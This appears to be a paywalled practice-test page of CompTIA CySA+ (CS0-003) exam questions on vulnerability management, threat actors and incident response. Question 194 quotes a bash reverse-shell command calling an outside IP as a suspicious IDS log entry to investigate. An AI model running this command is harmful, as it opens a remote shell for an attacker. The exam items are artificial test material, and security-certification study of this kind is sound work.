ExamGecko
Login
Home / CompTIA / CS0-003 / List of questions
Ask Question

CompTIA CS0-003 Practice Test - Questions Answers, Page 20

Add to Whishlist

List of questions

Question 191

Report Export Collapse

A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

CompTIA CS0-003 image Question 191 94812 10022024175105000000

Which of the following vulnerabilities should be prioritized for remediation?

Become a Premium Member for full access
  Unlock Premium Member

Question 192

Report Export Collapse

A security analyst needs to mitigate a known, exploited vulnerability related not tack vector that embeds software through the USB interface. Which of the following should the analyst do first?

Become a Premium Member for full access
  Unlock Premium Member

Question 193

Report Export Collapse

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

Become a Premium Member for full access
  Unlock Premium Member

Question 194

Report Export Collapse

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Become a Premium Member for full access
  Unlock Premium Member

Question 195

Report Export Collapse

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

Become a Premium Member for full access
  Unlock Premium Member

Question 196

Report Export Collapse

A company has the following security requirements:

. No public IPs

* All data secured at rest

. No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

CompTIA CS0-003 image Question 196 94817 10022024175105000000

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

Become a Premium Member for full access
  Unlock Premium Member

Question 197

Report Export Collapse

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

Become a Premium Member for full access
  Unlock Premium Member

Question 198

Report Export Collapse

Which of the following should be updated after a lessons-learned review?

Become a Premium Member for full access
  Unlock Premium Member

Question 199

Report Export Collapse

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

Become a Premium Member for full access
  Unlock Premium Member

Question 200

Report Export Collapse

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?

Become a Premium Member for full access
  Unlock Premium Member
Total 431 questions
Go to page: of 44
Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).
An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?
The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?
Which of the following characteristics ensures the security of an automated information system is the most effective and economical?
An organization identifies a method to detect unexpected behavior, crashes, or resource leaks in a system by feeding invalid, unexpected, or random data to stress the application. Which of the following best describes this testing methodology?
An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?
After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?